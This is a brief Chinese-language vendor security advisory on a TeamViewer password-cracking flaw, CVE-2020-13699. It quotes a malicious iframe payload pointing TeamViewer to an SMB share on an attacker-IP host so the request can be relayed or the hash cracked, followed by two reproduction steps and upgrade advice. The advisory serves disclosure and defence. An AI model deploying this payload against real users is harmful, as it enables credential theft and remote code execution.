TeamViewer 用户密码破解漏洞

TeamViewer是一款可以随时随地连接到远程桌面电脑、移动设备及Iot，让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问的远程连接控制软件。

TeamViewer多个版本中存在 用户密码破解漏洞，攻击者通过让被攻击者点击精心构造的嵌入恶意iframe（iframe src=’teamviewer10: –play \attacker-IPsharefake.tvs’）的网页，以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求（使用类似响应者）以执行代码（或捕获以进行哈希破解）。

复现过程

1.构造嵌入恶意iframe的页面。

2.访问恶意页面，即可启动TeamViewer。

雁行安全团队建议TeamViewer用户及时对受影响版本的TeamViewer进行升级。

https://www.teamviewer.com/en/download/previous-versions/

https://nvd.nist.gov/vuln/detail/CVE-2020-13699

如需应急支持，请联系雁行安全团队。

应急响应联系电话：400-029-4789 【转2】